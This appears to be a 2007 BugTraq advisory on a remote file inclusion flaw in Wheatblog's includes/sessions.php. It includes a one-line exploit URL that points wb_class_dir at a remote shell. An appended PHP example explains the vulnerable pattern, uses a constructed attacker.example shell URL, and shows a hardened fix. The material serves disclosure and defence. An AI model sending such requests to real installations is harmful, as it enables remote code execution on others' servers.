BugTraq
Wheatblog (wB) Remote File inclusion .. Nov 22 2007 09:30AM
security soqor net
Hello,

Wheatblog (wB) Remote File inclusion ..

Tested on 1.1; older versions are affected as well.

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net

Remote File Inclusion

File: includes/sessions.php, line 2:

include_once("$wb_class_dir/classDatabase.php");

The variable wb_class_dir can be controlled by the requester and set so that the file is included from a remote location.

Solution

Replace

include_once("$wb_class_dir/classDatabase.php");

with

// Protected By : HACKERS PAL
// Security (at) soqor (dot) net
// Http://WwW.SoQoR.NeT
// Deny direct requests to this file and any wb_class_dir already set in the global scope
if(eregi("sessions.php",$PHP_SELF) || isset($GLOBALS['wb_class_dir']))
{
    die("<h1>Forbidden 403<br> Protected By : HACKERS PAL</h1>");
}
include_once("$wb_class_dir/classDatabase.php");

Exploit:

includes/sessions.php?wb_class_dir=[Ev!1-Sh311]?

#WwW.SoQoR.NeT

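The vulnerable include and a hardened replacement, as an added example that is not part of the original post and not Wheatblog's own code. The posted guard leaves $wb_class_dir coming from the request and only tries to detect that; this version derives the class directory from the installation root instead, refuses direct requests to the include file, and treats any wb_class_dir in the request as a tampering signal worth logging. The hostname attacker.example, the IN_WB constant and the classes/ layout under the install root are assumptions.

```php
<?php
declare(strict_types=1);

/*
 * Added example, not Wheatblog's own code: the vulnerable include from
 * includes/sessions.php next to a resolver that never lets the request
 * choose the include path. Run with: php rfi_fix.php
 */

// Vulnerable pattern. With register_globals=On, a request such as
//   includes/sessions.php?wb_class_dir=http://attacker.example/shell.txt?
// creates $wb_class_dir before line 2 runs, and with allow_url_include=On
// PHP fetches and executes the remote file. The trailing "?" turns the
// rest of the include path into a query string on the attacker's server.
// (attacker.example is an assumed hostname.)
function vulnerable_class_dir(array $request, string $default): string
{
    // Equivalent to what register_globals did: the request overrides the install's value.
    return isset($request['wb_class_dir']) ? (string) $request['wb_class_dir'] : $default;
}

// Hardened: the class directory is a property of the installation, not of
// the request. It is derived from a fixed root and pinned with realpath(),
// which returns false for URLs, php:// wrappers and non-existent paths.
function hardened_class_dir(string $installRoot): string
{
    $dir = realpath($installRoot . '/classes');
    if ($dir === false || !is_file($dir . '/classDatabase.php')) {
        throw new RuntimeException('class directory or classDatabase.php not found');
    }
    return $dir;
}

// Guard for include-only files. IN_WB is an assumed constant that the
// front controller (index.php) would define before including anything
// under includes/; a direct request to includes/sessions.php never has it.
function refuse_direct_request(): void
{
    if (!defined('IN_WB')) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// Spot a request that still tries to smuggle the variable in, so the
// attempt can be logged even though it no longer has any effect.
function request_tampers_class_dir(array ...$sources): bool
{
    foreach ($sources as $source) {
        if (array_key_exists('wb_class_dir', $source)) {
            return true;
        }
    }
    return false;
}

// Demo on constructed data: a throwaway install root with a stub
// classDatabase.php, and the advisory's request shape as $_GET would see it.
$root = sys_get_temp_dir() . '/wb_demo_' . getmypid();
mkdir($root . '/classes', 0700, true);
file_put_contents($root . '/classes/classDatabase.php', "<?php\nclass Database {}\n");

$attackerGet = ['wb_class_dir' => 'http://attacker.example/shell.txt?']; // constructed input

echo "vulnerable resolves to: ", vulnerable_class_dir($attackerGet, $root . '/classes'), "\n";
echo "hardened resolves to:   ", hardened_class_dir($root), "\n";
echo "tamper attempt seen:    ", request_tampers_class_dir($attackerGet, $_POST, $_COOKIE) ? 'yes' : 'no', "\n";

unlink($root . '/classes/classDatabase.php');
rmdir($root . '/classes');
rmdir($root);
```

In a real deployment refuse_direct_request() is the first statement of every file under includes/, and the PHP configuration keeps register_globals=Off and allow_url_include=Off so that even a regression in the resolver cannot turn a query parameter into a remote include.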

Copyright 2010, SecurityFocus